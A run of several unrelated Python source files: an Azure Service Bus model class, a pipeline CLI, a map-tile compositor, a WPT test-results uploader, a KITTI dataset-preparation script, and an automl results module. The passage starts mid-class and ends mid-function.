"""Description of a Service Bus topic resource.
:param topic_name: Name of the topic.
:type topic_name: str
:param authorization_rules: Authorization rules for resource.
:type authorization_rules:
list[~azure.servicebus.management._generated.models.AuthorizationRule]
:param auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the topic is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:param default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:param duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
duration of the duplicate detection history. The default value is 10 minutes.
:type duplicate_detection_history_time_window: ~datetime.timedelta
:param enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:param enable_partitioning: A value that indicates whether the topic is to be partitioned
across multiple message brokers.
:type enable_partitioning: bool
:param max_size_in_megabytes: The maximum size of the topic in megabytes, which is the size of
memory allocated for the topic.
:type max_size_in_megabytes: long
:param requires_duplicate_detection: A value indicating if this topic requires duplicate
detection.
:type requires_duplicate_detection: bool
:param status: Status of a Service Bus resource. Possible values include: "Active", "Creating",
"Deleting", "Disabled", "ReceiveDisabled", "Renaming", "Restoring", "SendDisabled", "Unknown".
:type status: str or ~azure.servicebus.management._generated.models.EntityStatus
:param support_ordering: A value that indicates whether the topic supports ordering.
:type support_ordering: bool
:param user_metadata: Metadata associated with the topic.
:type user_metadata: str
"""
_attribute_map = {
'topic_name': {'key': 'TopicName', 'type': 'str'},
'authorization_rules': {'key': 'AuthorizationRules', 'type': '[AuthorizationRule]', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect', 'wrapped': True, 'itemsName': 'AuthorizationRule', 'itemsNs': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'auto_delete_on_idle': {'key': 'AutoDeleteOnIdle', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'default_message_time_to_live': {'key': 'DefaultMessageTimeToLive', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'duplicate_detection_history_time_window': {'key': 'DuplicateDetectionHistoryTimeWindow', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'enable_batched_operations': {'key': 'EnableBatchedOperations', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'enable_partitioning': {'key': 'EnablePartitioning', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'max_size_in_megabytes': {'key': 'MaxSizeInMegabytes', 'type': 'long'},
'requires_duplicate_detection': {'key': 'RequiresDuplicateDetection', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'status': {'key': 'Status', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'support_ordering': {'key': 'SupportOrdering', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'user_metadata': {'key': 'UserMetadata', 'type': 'str'},
}
_xml_map = {
'name': 'TopicDescription', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
}
def __init__(
self,
**kwargs
):
super(TopicDescription, self).__init__(**kwargs)
self.topic_name = kwargs.get('topic_name', None)
self.authorization_rules = kwargs.get('authorization_rules', None)
self.auto_delete_on_idle = kwargs.get('auto_delete_on_idle', None)
self.default_message_time_to_live = kwargs.get('default_message_time_to_live', None)
self.duplicate_detection_history_time_window = kwargs.get('duplicate_detection_history_time_window', None)
self.enable_batched_operations = kwargs.get('enable_batched_operations', None)
self.enable_partitioning = kwargs.get('enable_partitioning', None)
self.max_size_in_megabytes = kwargs.get('max_size_in_megabytes', None)
self.requires_duplicate_detection = kwargs.get('requires_duplicate_detection', None)
self.status = kwargs.get('status', None)
self.support_ordering = kwargs.get('support_ordering', None)
self.user_metadata = kwargs.get('user_metadata', None)
|
#!/usr/bin/env python
# This is a temporary version of ariadne as I change argument handling
import sys
import os
import ariadne
import argparse
#from ariadne import plugin
#from ariadne import tools
#from ariadne import pipeline
#from ariadne import deftools
#from ariadne import argparse
plugin=ariadne.plugin
tools=ariadne.tools
pipeline=ariadne.pipeline
deftools=ariadne.deftools
# ariadne.py -- command line interface for ariadne.
def print_usage():
"""Prints a general usage statement for ariadne."""
print("Usage: ariadne.py <command> [args]")
print("Manage, test, benchmark, and run software pipelines.")
print("\nWhere <command> is one of the following:")
print("\tdataset \tManage, fetch, validate, and unpack datasets.")
print("\ttest \tRun tests on a pipeline.")
print("\tbenchmark\tBenchmark a pipeline.")
print("\tpipeline \tRun and manage pipelines.")
print("\tplugins \tList all available plugins.")
def print_dataset_usage():
"""Prints a usage statement for the dataset component of ariadne."""
print("Usage: ariadne.py dataset <action> [datasetname] [destination]")
print("\nWhere <action> is one of the following:")
print("\tfetch\tFetch, unpack, and validate a dataset.")
print("\tlist \tShow all known dataset definitions.")
print("\tshow \tShow information about a datset.")
def print_pipeline_usage():
"""Prints a usage statement for the pipeline component of ariadne."""
print("Usage: ariadne.py pipeline <action> <pipelinename> [pipeline args]")
print("\nWhere <action> is one of the following:")
print("\trun \tRun the pipeline.")
print("\tcheckdepends\tEnsure that all of the pipeline's modules are present.")
def print_test_usage():
"""Prints a usage statement for the test component of ariadne."""
print("Usage: ariadne.py test <pipelinename> <test definition file> [args]")
def print_benchmark_usage():
"""Prints a usage statement for the benchmark component of ariadne."""
print("Usage: ariadne.py benchmark <pipelinename> [pipeline args]")
print("\nWhere [pipeline args] is a list of all arguments to send")
print("\tto the pipeline.")
def build_arg_dict(arg_list):
"""Builds a dictionary from an argument listing."""
d={}
for a in arg_list:
toks=a.split('=')
d[toks[0]]=toks[1]
return d
def list_datasets(path):
"""Lists information for all datasets present in the given path."""
dirlisting=os.listdir(path)
for entry in dirlisting:
if tools.get_extension(entry)==".dataset":
dataset_contents=deftools.parse_file(path+"/"+entry)
ds_name=""
ds_descrip=""
try:
ds_name=deftools.search(dataset_contents, "name")[0]
except:
ds_name="None"
try:
ds_descrip=deftools.search(dataset_contents, "description")[0]
except:
ds_descrip="No description found."
print("%s: %s" % (ds_name, ds_descrip))
def run_dataset(action, dataset_name, confdict):
"""Performs actions related to fetching, unpacking, and managing datasets."""
if action=="" and dataset_name=="":
print_dataset_usage()
return
dataset_destination=confdict['datadir'][0]
# Determine where, exactly, this dataset is:
fullpath="%s/%s.dataset" % (tools.get_default_dataset_dir(), dataset_name)
if not tools.file_exists(fullpath):
fullpath="./%s.dataset" % dataset_name
dataset_filename=fullpath
if action=="fetch":
if not tools.file_exists(fullpath):
print("ERROR: Dataset "+dataset_name+" does not exist either in ./ or %s."
% tools.get_default_dataset_dir())
return
dataset_contents = deftools.parse_file(dataset_filename)
dataset_type = deftools.search(dataset_contents, "type")[0]
if len(dataset_type) == 0:
print("ERROR: Dataset has unspecified type. Cannot handle.")
exit(2)
dataset_handler=plugin.get_can_handle(dataset_type)
if dataset_handler==None:
print("Could not find a plugin to handle dataset type: %s" % dataset_type)
return
h=dataset_handler(dataset_filename)
h.fetch(dataset_destination)
h.unpack(dataset_destination)
elif action == "list":
list_datasets(tools.get_default_dataset_dir())
list_datasets(".")
elif action == "show":
if not tools.file_exists(fullpath):
print("ERROR: Dataset %s does not exist." % dataset_name)
return
dataset_contents=deftools.parse_file(fullpath)
dataset_type=deftools.search(dataset_contents, "type")[0]
handler=None
dataset_handler=plugin.get_can_handle(dataset_type)
print("Dataset: "+dataset_name)
print("Type: "+deftools.search(dataset_contents, "type")[0])
if dataset_handler == None:
print("No plugin found to handle this type of dataset.")
else:
print("Handler plugin name: "+dataset_handler.name)
else:
print_dataset_usage()
exit(0)
def run_plugins():
"""Lists all currently installed plugins."""
print("List of plugins:")
o = sys.stdout
longest_len=0
for p in plugin.plugin_list:
if len(str(p[0].name)) > longest_len:
longest_len=len(str(p[0].name))
longest_len+=3
o.write("Name")
for i in range(0, longest_len-4, 1):
o.write(" ")
o.write("Type\n")
for p in plugin.plugin_list:
namedelta=longest_len-len(str(p[0].name))
namestr=str(p[0].name)
for i in range(0, namedelta, 1):
namestr+=' '
namestr+=p[1]+'\n'
o.write(namestr)
def run_pipeline(action, pipe_name, args, confdict):
"""Performs actions related to running and managing pipelines."""
if action == "run":
pipe_args=build_arg_dict(args)
p=pipeline.Pipeline(pipe_name+".pipeline")
p.run(pipe_args)
elif action=="checkdepends":
p=pipeline.Pipeline(pipe_name+".pipeline")
p.check_dependencies()
def run_test(pipe_name, test_filename, confdict):
"""Performs actions related to testing plugins and pipelines."""
if pipe_name=="" or test_filename=="":
print_test_usage()
return
f=open(test_filename, 'r')
contents=f.read()
f.close()
lines=contents.splitlines()
arglist=[]
for l in lines:
linetoks=l.split()
name=linetoks[0]
argdict={'test_name': name}
for t in linetoks[1:]:
pair=t.split('=')
argdict[pair[0]]=pair[1]
print(argdict)
arglist.append(argdict)
p=pipeline.Pipeline(pipe_name+".pipeline")
p.validate(arglist, step)
def run_benchmark(pipe_name, args, confdict):
"""Performs actions related to benchmarking plugins and pipelines."""
if pipe_name=="":
print_benchmark_usage()
return
pipe_name=args[0]
argdict=build_arg_dict(args)
p=pipeline.Pipeline(pipe_name+".pipeline")
p.benchmark(argdict)
def run_plugin(runstr, plugin_name, plugin_dir, plugin_args, confdict):
"""Runs an individual plugin by the method specified."""
if plugin_name=="":
print_run_plugin_usage()
return
tools.init_plugins(plugin_dir)
pclass=plugin.search_plugins(plugin_name)
if pclass==None:
print("ERROR: Plugin %s could not be found!" % plugin_name)
return
argdict=build_arg_dict(plugin_args)
pl=pclass()
if runstr=="runplugin":
pl.run(argdict)
elif runstr=="trainplugin":
try:
pl.train(argdict)
except:
print("ERROR: Couldn't train plugin: %s" % plugin_name)
elif runstr=="testplugin":
retv=0
try:
retv=pl.test()
except:
print("ERROR: Couldn't test plugin: %s" % plugin_name)
exit(not retv)
def main(argv):
"""Entry point and dispatcher for the ariadne cli."""
# These two are mostly for the benefit of plugins.
sys.path.append(".")
sys.path.append(tools.get_base_dir()+"/ariadne")
tools.init_plugins()
if len(argv) == 1:
print_usage()
exit()
# Now attempt to read the configuration file:
conftoks=[]
try:
conftoks=deftools.parse_file(tools.get_default_config_file())
except:
# Try to write one instead:
print("Generating default config file at %s..." % (tools.get_default_config_file()))
conffile=open(tools.get_default_config_file(), 'w')
tools.prep_default_config_file(conffile)
conffile.close()
conftoks=tools.get_default_conf_toks()
confdict=deftools.make_dict(conftoks)
plugin.set_config(confdict)
# Load any plugins specified in the configuration:
try:
pdirs=confdict['plugindirs']
for p in pdirs:
tools.init_plugins(p)
print("Loaded plugins from: %s" % p)
except:
pass
parser=argparse.ArgumentParser(description="Manage, test, and benchmark software pipelines.")
parser.add_argument("cmd", help=argparse.SUPPRESS)
parser.add_argument("optarg1", nargs="?")
parser.add_argument("optarg2", nargs="?")
parser.add_argument("moreargs", nargs="*")
results=parser.parse_args()
cmd=results.cmd
if cmd == "dataset":
run_dataset(results.optarg1, results.optarg2, confdict)
elif cmd == "test":
run_test(results.optarg1, results.optarg2, confdict)
elif cmd == "benchmark":
if results.optarg2!="":
results.moreargs.append(results.optarg2)
run_benchmark(results.optarg1, results.moreargs, confdict)
elif cmd == "pipeline":
run_pipeline(results.optarg1, results.optarg2, results.moreargs, confdict)
elif cmd == "plugins":
run_plugins()
elif cmd == "runplugin" or cmd == "trainplugin":
run_plugin(cmd, results.optarg1, results.optarg2, results.moreargs, confdict)
if __name__ == "__main__":
main(sys.argv)
|
#!/usr/bin/env python3
import cv2 as cv
import json
import math
import numpy as np
import os
import sys
from requests.utils import requote_uri
from geojson import FeatureCollection, Feature, Polygon, dumps
config = json.load(open("config.json","r"))
target = config.get('target')
tilesize = config.get('tilesize')
maxzoom = config.get('maxzoom')
spacing = config.get('spacing')
tile_format = '.webp'
LLBOUNDS = [-180.0, 180.0, -180.0, 180.0]
match = None
if len(sys.argv)>=2:
match = sys.argv[1]
# pixel coordinates as x,y
# tile coordinates as t,u
def xy_to_latlon(x,y,zoom):
max_x = -float(math.pow(2,zoom-1) * tilesize)
lat = x / max_x * LLBOUNDS[1]
max_y = float(math.pow(2,zoom-1) * tilesize)
lon = y / max_y * LLBOUNDS[3]
return lat,lon
features = []
prev_x, prev_y, prev_zoom = None, None, None
ymax = -1e10
for source in config.get('sources',[]):
if len(source)<7:
continue
filename, xrel, yrel, imgzoom, title, family, date, location, comment, href = source[:10]
# auto-place after spacing
if xrel=="+":
xrel = prev_x + int((2**imgzoom) * spacing)
xrel = xrel * (2**(imgzoom-prev_zoom))
print("CALCULATED NEW X FROM", prev_x, " AS ", xrel)
if yrel=="+":
yrel = prev_y + int((2**imgzoom) * spacing)
yrel = yrel * (2**(imgzoom-prev_zoom))
print("CALCULATED NEW Y FROM", prev_y, " AS ", yrel)
print("Processing ",filename)
source_im = cv.imread(filename, cv.IMREAD_UNCHANGED)
w,h = source_im.shape[:2]
# auto-place centered
if yrel=="=":
yrel = prev_yc * (2**(imgzoom-prev_zoom)) - int(h/2)
print("CALCULATED NEW Y FROM CENTER", prev_yc, " AS ", yrel)
# auto-place right of previous column
elif yrel==">":
yrel = (ymax + 1.0/100) * (2**imgzoom)
print("CALCULATED NEW Y FROM YMAX", ymax, " AS ", yrel, imgzoom)
else:
ymax = yrel
# might be off by a factor off two, to be verified.
if title:
print(title)
print("PIXEL COORDINATES ", xrel, yrel, xrel+w, yrel+h)
left, top = xy_to_latlon(xrel, yrel, imgzoom)
right, bottom = xy_to_latlon(xrel+w, yrel+h, imgzoom)
poly = Polygon([[(top, left), (top, right), (bottom, right), (bottom, left), (top, left)]])
feat = Feature(geometry=poly, properties = {
"title": title,
"family": family,
"date": date,
"loc": location,
"comment": comment,
"href": href
})
features.append(feat)
#if imgzoom < maxzoom:
# factor = math.pow(2, maxzoom-imgzoom)
# source_im = cv.resize(source_im, (0, 0), fx=factor, fy=factor)
# FIXME: memory issues when blowing up - add maxzoom (and minzoom) to define display range
# calculate outer borders of previous item to calculate relative positions
prev_x = xrel + w
prev_y = yrel + h
prev_yc = yrel + h/2
prev_yr = float(yrel + h) / (2**imgzoom)
if prev_yr > ymax:
ymax = prev_yr
print("NEW YMAX ", ymax, "FROM", yrel, h)
prev_zoom = imgzoom
if match and not match in filename:
continue
zoom = imgzoom
w = h = 256 # just to pass the first check
while zoom > 1 and w > 2 and h > 2:
if zoom <= maxzoom:
# relative zero (center) at the defined zoom level
x0 = math.floor(tilesize * math.pow(2, zoom-1))
y0 = math.floor(tilesize * math.pow(2, zoom-1))
# image coordinates at that zoom level
xi, yi = x0 + xrel, y0 + yrel
# image size
# NOTE: source images should always be transparent png, or overlaps will be covered
w,h = source_im.shape[:2]
wt = math.ceil(w / tilesize)
ht = math.ceil(h / tilesize)
# first tile to consider
t0 = math.floor(xi / tilesize)
u0 = math.floor(yi / tilesize)
# top left of the considered tile
xA = t0 * tilesize
yA = u0 * tilesize
# offset of the image to the first tile
off_x = xi - xA
off_y = yi - yA
off_t = math.floor(off_x / tilesize)
off_u = math.floor(off_y / tilesize)
# CHECK: adjust range to actually cover the location of the translated image
folders={}
for tx in range(0, wt+1): # TODO: try t0-t0+wt
for ty in range(0, ht+1):
# read current background tile
folder = target+"tiles/"+str(zoom)+"/"+str(u0+ty)
tile_url = folder +"/"+str(t0+tx)+tile_format
#print("Loading "+tile_url)
white_tile = np.zeros([tilesize, tilesize, 4],dtype=np.uint8)
#white_tile.fill(255)
bg = cv.imread(tile_url, cv.IMREAD_UNCHANGED)
if bg is None:
bg = white_tile.copy()
bg = cv.cvtColor(bg, cv.COLOR_BGR2BGRA)
# cut relevant section of source_im
from_x = max(0, tx * tilesize - off_x)
from_y = max(0, ty * tilesize - off_y)
to_x = min(w, (tx+1) * tilesize - off_x)
to_y = min(h, (ty+1) * tilesize - off_y)
cutout = source_im[from_x:to_x, from_y:to_y]
# correct location of background
dest_x = max(0, off_x - tx * tilesize)
dest_y = max(0, off_y - ty * tilesize)
dto_x = dest_x + to_x - from_x
dto_y = dest_y + to_y - from_y
# paste cutout onto background
# TODO: actually paste, not overwrite
# eg. overwrite white_tile, then merge with bg
try:
bg[dest_x:dto_x, dest_y:dto_y] = cutout
except:
continue
#print("SOMETHING FAILED")
#cv.imshow('BG',bg)
#print("CUTOUT SIZE:", (from_x, to_x, from_y, to_y))
#print("FROM Y:", (from_y))
#print("TO Y:", (to_y))
#print("H:", h)
#cv.waitKey(1)
#sys.exit(1)
# then write that tile to file
if not folder in folders:
#print("Writing ",folder)
try:
os.makedirs(folder)
folders[folder]=True
except:
pass
cv.imwrite(tile_url, bg)
zoom = zoom - 1
xrel = math.floor(xrel / 2)
yrel = math.floor(yrel / 2)
source_im = cv.resize(source_im, (0, 0), fx=0.5, fy=0.5)
w = math.floor(w / 2)
h = math.floor(h / 2)
fc = FeatureCollection(features)
fp = open(target+"features.geojson", "w")
fp.write(dumps(fc))
fp.close()
def species_link(s):
return '<li><a href="https://setzkasten.relet.net#?{}">{}</a></li>'.format(requote_uri(s),s)
species_list=map(lambda f:f.properties.get('title'), features)
species_links = "\n".join(map(species_link, sorted(species_list)))
fi = open(target+"species_index.html", "w")
fi.write("<html><body><ul>{}<ul></body><html>".format(species_links))
fi.close()
|
#!/usr/bin/env python
# Copyright 2018 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import gzip
import logging
import os
import platform
import re
import requests
import shutil
import subprocess
import tempfile
def main(raw_results_directory, platform_id, browser_name, browser_version,
os_name, os_version, wpt_revision, wpt_revision_date, bucket_name,
notify_url, notify_secret):
'''Consolidate the data generated by the WPT CLI (via its `--log-wptreport`
flag) into a set of gzip-encoded JSON files, upload those files to a Google
Cloud Storage bucket, and send an HTTP request to a given web server to
signal that this operation has occurred.'''
log_format = '%(asctime)s %(levelname)s %(name)s %(message)s'
logging.basicConfig(level='INFO', format=log_format)
logger = logging.getLogger('upload-results')
raw_results_files = [
os.path.join(raw_results_directory, filename)
for filename in os.listdir(raw_results_directory)
]
os_version = expand_os_version(os_name, os_version)
# The current implementation of https://wpt.fyi does not render complete
# SHA sums gracefully. Truncate the value in order to satisy the needs of
# the interface.
wpt_revision = wpt_revision[:10]
summary = summarize(raw_results_files)
temp_dir = tempfile.mkdtemp()
try:
summary_file_name = '%s-summary.json.gz' % platform_id
logger.info('Writing %s to local filesystem', summary_file_name)
write_gzip_json([temp_dir, summary_file_name], summary)
full_results_dir = os.path.join(temp_dir, platform_id)
logger.info('Writing %s results to local filesystem', len(summary))
for test_filename, raw_result in each_result(raw_results_files):
write_gzip_json([full_results_dir, test_filename], raw_result)
upload_url = 'gs://%s/%s' % (bucket_name, wpt_revision)
download_url = 'https://storage.googleapis.com/%s/%s' % (
bucket_name, wpt_revision)
logger.info('Uploading results to %s', upload_url)
upload(temp_dir, upload_url)
logger.info('Upload successful.')
finally:
shutil.rmtree(temp_dir)
logger.info('Notifying %s' % notify_url)
status_code, response_text = notify(
notify_url,
notify_secret,
{
'browser_name': browser_name,
'browser_version': browser_version,
'os_name': os_name,
'os_version': os_version,
'revision': wpt_revision,
'commit_date': wpt_revision_date,
'results_url': '%s/%s' % (download_url, summary_file_name)
}
)
logger.info('Response status code: %s', status_code)
logger.info('Response text: %s', response_text)
assert status_code >= 200 and status_code < 300
def each_result(raw_results_files):
for filename in raw_results_files:
with open(filename) as handle:
contents = json.load(handle)
assert 'results' in contents
for result in contents['results']:
assert 'test' in result
# The "test" attribute describes the filesystem path to the
# test file using a UNIX directory separator (`/`) and
# including a leading separtor. Translate into a relative path
# which is appropriate for the operating system executing this
# script.
test_filename_parts = result['test'].split('/')[1:]
test_filename = os.path.sep.join(test_filename_parts)
yield (test_filename, result)
def upload(dir_name, location):
return_code = subprocess.check_call([
'gsutil', '-m', '-h', 'Content-Encoding:gzip', 'rsync', '-r', dir_name,
location
])
assert return_code == 0
def write_gzip_json(filepath, payload):
filename = os.path.sep.join(filepath)
# Create all non-existent directories in a specified path
try:
os.makedirs(os.path.dirname(filename))
except OSError:
pass
with gzip.open(filename, 'wb') as f:
payload_str = json.dumps(payload)
f.write(payload_str)
def summarize(filenames):
summary = {}
for filename in filenames:
with open(filename) as handle:
data = json.load(handle)
assert 'results' in data
assert isinstance(data['results'], list)
for result in data['results']:
test_file = result['test']
assert test_file not in summary, (
'test_file "%s" is not already present in summary')
assert 'status' in result
if result['status'] in ('OK', 'PASS'):
summary[test_file] = [1, 1]
else:
summary[test_file] = [0, 1]
assert 'subtests' in result
assert isinstance(result['subtests'], list)
for subtest in result['subtests']:
assert 'status'in subtest
if subtest['status'] == 'PASS':
summary[test_file][0] += 1
summary[test_file][1] += 1
return summary
def expand_os_version(name, version):
'''Expand the string "*" to describe the version of the system running this
script.
This behavior assumes that the uploading script is run on the same platform
from which the results were collected. This assumption may not always hold,
but the functionality is implemented in order to satisfy the expectations
of the data's consumer.'''
if version != '*':
return version
if name != platform.system().lower():
raise ValueError('Cannot expand version wildcard for a foreign system')
match = re.search(r'[0-9]+\.[0-9]+', platform.release())
if match is None:
raise ValueError('Cannot infer host platform version')
return match.group(0)
def notify(url, secret, payload):
response = requests.post(url,
params={'secret': secret},
data=json.dumps(payload))
return (response.status_code, response.text)
parser = argparse.ArgumentParser(description=main.__doc__)
parser.add_argument('--raw-results-directory', required=True)
parser.add_argument('--platform-id', required=True)
parser.add_argument('--browser-name', required=True)
parser.add_argument('--browser-version', required=True)
parser.add_argument('--os-name', required=True)
parser.add_argument('--os-version', required=True)
parser.add_argument('--wpt-revision', required=True)
parser.add_argument('--wpt-revision-date', required=True)
parser.add_argument('--bucket-name', required=True)
parser.add_argument('--notify-url', required=True)
parser.add_argument('--notify-secret', required=True)
if __name__ == '__main__':
main(**vars(parser.parse_args()))
|
<reponame>markrofail/multi-modal-deep-learning-for-vehicle-sensor-data-abstraction-and-attack-detection<gh_stars>0
import click
from src.helpers import frame_selector, paths, timeit
from src.helpers.flags import Verbose
from src.regnet.data import kitti
###############################################################################
# ENVIROMENT PARAMETERS #
###############################################################################
config = paths.config.read(paths.config.regnet())
VERBOSE = config['ENVIROMENT_CONFIG']['VERBOSE']
###############################################################################
# DATASET PARAMETERS
###############################################################################
NUM_FRAMES = config['DATASET']['NUM_FRAMES']
TRAIN_PCT = config['DATASET']['TRAIN_PCT']
VALID_PCT = config['DATASET']['VALID_PCT']
TEST_PCT = config['DATASET']['TEST_PCT']
@click.command()
@click.option(
'--keep', '-k',
is_flag=True,
help='keep redundant files',
)
@click.option(
'--random/--kitti',
is_flag=True,
)
@timeit.logtime
def main(keep=False, random=True):
# choose the train, valid, test datasets randomly
if random:
datasets = frame_selector.generate_random(
frame_count=NUM_FRAMES, train_pct=TRAIN_PCT, valid_pct=VALID_PCT, test_pct=TEST_PCT,
log_path=paths.checkpoints.regnet().with_name('dataset'))
else:
train_drives = paths.get_all_drives('2011_09_26', exclude=[5, 70])
train_dataset = list()
for drive_info in train_drives:
train_dataset.extend(paths.get_all_frames(*drive_info))
valid_drives = [('2011_09_26', 5), ('2011_09_26', 70)]
valid_dataset = list()
for drive_info in valid_drives:
valid_dataset.extend(paths.get_all_frames(*drive_info))
test_dataset = paths.get_all_frames('2011_09_30', 28)
datasets = [train_dataset, valid_dataset, test_dataset]
# generate each dataset
datasets = zip(datasets, ['train', 'valid', 'test'])
for dataset, name in datasets:
make_data(dataset, name, keep=keep)
if not keep:
cleanUp()
def make_data(frames, name, verbose=VERBOSE, keep=False):
if verbose > Verbose.SILENT:
print('\nGenerating regnet/{} dataset...'.format(name.upper()))
# generate a unique random decalibration matrix for every frame
kitti.make_decalib.generate_frames(frames=frames, verbose=verbose)
# project each lidar scan using the frame's Hinit (Hinit = decalibration * Hgt)
kitti.make_depthmaps.generate_frames(
frames=frames, calib_batches=True, color='gray', verbose=verbose)
# ensure all images are of the same size (resize and crop all images)
kitti.image_rescale.preproccess_frames(frames=frames, verbose=verbose, keep=keep)
# convert images to numpy arrays
kitti.make_tensors.generate_frames(frames=frames, data_type='rgb', verbose=verbose, keep=keep)
kitti.make_tensors.generate_frames(frames=frames, data_type='depth', verbose=verbose, keep=keep)
# check that every frame's data is complete (every frame has an rgb image, depthmap and Hinit)
kitti.data_sanity.check_frames(frames=frames, verbose=verbose)
# encode every frame into a TFrecord
kitti.make_records.generate_frames(frames=frames, dataset=name, verbose=verbose, keep=keep)
def cleanUp(verbose=VERBOSE, force_all=False):
import shutil
if verbose > Verbose.SILENT:
print('\nRemoving redundant files to save space...')
directories = [paths.DATA_RAW_PATH,
paths.DATA_INTERIM_PATH,
paths.DATA_PROCESSED_PATH.joinpath('KITTI')]
exclude_folders = list()
if not force_all:
exclude_folders.extend(['train', 'test', 'valid'])
exclude_files = ['.gitkeep']
for directory in directories:
if not directory.exists():
continue
if verbose > Verbose.SILENT:
print(' # deleting {}/**'.format(directory.parent.name))
for child in directory.iterdir():
if child.is_dir():
if child.name not in exclude_folders:
shutil.rmtree(child, ignore_errors=True)
else:
if child.name not in exclude_files:
child.unlink()
if __name__ == '__main__':
main()
|
"""
**results** module provides the logic to format, save and read predictions generated by the *automl frameworks* (cf. ``TaskResult``),
as well as logic to compute, format, save, read and merge scores obtained from those predictions (cf. ``Result`` and ``Scoreboard``).
"""
from functools import partial
import collections
import io
import logging
import math
import os
import re
import statistics
import numpy as np
from numpy import nan, sort
import pandas as pd
from .data import Dataset, DatasetType, Feature
from .datautils import accuracy_score, confusion_matrix, f1_score, log_loss, balanced_accuracy_score, mean_absolute_error, mean_squared_error, mean_squared_log_error, r2_score, roc_auc_score, read_csv, write_csv, is_data_frame, to_data_frame
from .resources import get as rget, config as rconfig, output_dirs
from .utils import Namespace, backup_file, cached, datetime_iso, json_load, memoize, profile
log = logging.getLogger(__name__)
class NoResultError(Exception):
pass
# TODO: reconsider organisation of output files:
# predictions: add framework version to name, timestamp? group into subdirs?
class Scoreboard:
results_file = 'results.csv'
@classmethod
def all(cls, scores_dir=None):
return cls(scores_dir=scores_dir)
@classmethod
def from_file(cls, path):
sep = rconfig().token_separator
folder, basename = os.path.split(path)
framework_name = None
benchmark_name = None
task_name = None
patterns = [
cls.results_file,
rf"(?P<framework>[\w\-]+){sep}benchmark{sep}(?P<benchmark>[\w\-]+)\.csv",
rf"benchmark{sep}(?P<benchmark>[\w\-]+)\.csv",
rf"(?P<framework>[\w\-]+){sep}task{sep}(?P<task>[\w\-]+)\.csv",
rf"task{sep}(?P<task>[\w\-]+)\.csv",
r"(?P<framework>[\w\-]+)\.csv",
]
found = False
for pat in patterns:
m = re.fullmatch(pat, basename)
if m:
found = True
d = m.groupdict()
benchmark_name = 'benchmark' in d and d['benchmark']
task_name = 'task' in d and d['task']
framework_name = 'framework' in d and d['framework']
break
if not found:
return None
scores_dir = None if path == basename else folder
return cls(framework_name=framework_name, benchmark_name=benchmark_name, task_name=task_name, scores_dir=scores_dir)
@staticmethod
# @profile(logger=log)
def load_df(file):
name = file if isinstance(file, str) else type(file)
log.debug("Loading scores from `%s`.", name)
exists = isinstance(file, io.IOBase) or os.path.isfile(file)
df = read_csv(file) if exists else to_data_frame({})
log.debug("Loaded scores from `%s`.", name)
return df
@staticmethod
# @profile(logger=log)
def save_df(data_frame, path, append=False):
exists = os.path.isfile(path)
new_format = False
if exists:
df = read_csv(path, nrows=1)
new_format = list(df.columns) != list(data_frame.columns)
if new_format or (exists and not append):
backup_file(path)
new_file = not exists or not append or new_format
is_default_index = data_frame.index.name is None and not any(data_frame.index.names)
log.debug("Saving scores to `%s`.", path)
write_csv(data_frame,
path=path,
header=new_file,
index=not is_default_index,
append=not new_file)
log.info("Scores saved to `%s`.", path)
def __init__(self, scores=None, framework_name=None, benchmark_name=None, task_name=None, scores_dir=None):
self.framework_name = framework_name
self.benchmark_name = benchmark_name
self.task_name = task_name
self.scores_dir = (scores_dir if scores_dir
else output_dirs(rconfig().output_dir, rconfig().sid, ['scores']).scores)
self.scores = scores if scores is not None else self._load()
@cached
def as_data_frame(self):
# index = ['task', 'framework', 'fold']
index = []
df = (self.scores if is_data_frame(self.scores)
else to_data_frame([dict(sc) for sc in self.scores]))
if df.empty:
# avoid dtype conversions during reindexing on empty frame
return df
fixed_cols = ['id', 'task', 'framework', 'constraint', 'fold', 'result', 'metric', 'mode', 'version',
'params', 'app_version', 'utc', 'duration', 'training_duration', 'predict_duration', 'models_count', 'seed', 'info']
fixed_cols = [col for col in fixed_cols if col not in index]
dynamic_cols = [col for col in df.columns if col not in index and col not in fixed_cols]
dynamic_cols.sort()
df = df.reindex(columns=[]+fixed_cols+dynamic_cols)
log.debug("Scores columns: %s.", df.columns)
return df
@cached
def as_printable_data_frame(self):
str_print = lambda val: '' if val in [None, '', 'None'] or (isinstance(val, float) and np.isnan(val)) else val
int_print = lambda val: int(val) if isinstance(val, float) and not np.isnan(val) else str_print(val)
num_print = lambda fn, val: None if isinstance(val, str) else fn(val)
df = self.as_data_frame()
force_str_cols = ['id']
nanable_int_cols = ['fold', 'models_count', 'seed']
low_precision_float_cols = ['duration', 'training_duration', 'predict_duration']
high_precision_float_cols = [col for col in df.select_dtypes(include=[np.float]).columns if col not in ([] + nanable_int_cols + low_precision_float_cols)]
for col in force_str_cols:
df[col] = df[col].astype(np.object).map(str_print).astype(np.str)
for col in nanable_int_cols:
df[col] = df[col].astype(np.object).map(int_print).astype(np.str)
for col in low_precision_float_cols:
